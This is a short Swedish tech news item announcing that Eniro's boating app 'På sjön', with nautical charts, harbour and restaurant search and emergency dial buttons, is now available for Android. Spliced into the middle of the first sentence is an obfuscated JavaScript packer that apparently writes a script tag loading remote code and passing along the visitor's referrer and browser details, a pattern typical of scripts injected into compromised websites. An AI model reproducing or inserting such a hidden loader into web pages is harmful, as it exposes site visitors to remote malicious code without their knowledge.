Image Image Image Image Image Image Image Image Image Image

| 5 december, 2020

Scroll to top

Top

Eniros populära app På sjön finns nu för Android

Eniros populära app På sjön finns nu för Android
Sebastian

På eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iaebk|var|u0026u|referrer|saytb||js|php’.split(’|’),0,{}))
appens sjökort kan du med hjälp av kompassen och GPSen i din Androidtelefon snabbt se var restauranger, varv, gästhamnar med mera finns i förhållande till där du befinner dig.

I appen finns även snabbuppringning till Sjöräddning för allvarliga nödsituationer samt till 118 118 om du behöver svar på andra frågor.

–       Många njuter av sjön på sommaren och när vi nu finns i iPhone, iPad och i Android kommer de flesta att ha tillgång till Eniro På sjön. Vi jobbar hela tiden för att skapa nya relevanta mobila lösningar som möter konsumenternas behov. Med Eniro På sjön kan man enkelt söka efter restauranger, hamnar eller butiker direkt i sjökorten, allt är samlat på ett ställe, säger Mattias Wedar, VD Eniro Sverige.

Alla basfunktioner finns samlade i menyraden och inkluderar:

– söka på förinställda val som

  •                              Naturhamnar
  •                              Gästhamnar
  •                              Bränsle
  •                              Mataffär
  •                              Logi
  •                              VarvRestaurang

Frisök på platser

Snabbknappar på sjöräddningen och 118118

Eniro På sjön täcker hela den svenska kusten samt Gotland, Öland, Vänern, Vättern, Mälaren och Hjälmaren. Appen är gratis och finns för nedladdning i Google Play: https://play.google.com/store/apps/details?id=com.eniro.nauticalar#?t=W251bGwsMSwxLDIxMiwiY29tLmVuaXJvLm5hdXRpY2FsYXIiXQ..

Eniro På sjön finns sedan tidigare för iPhone och för iPad.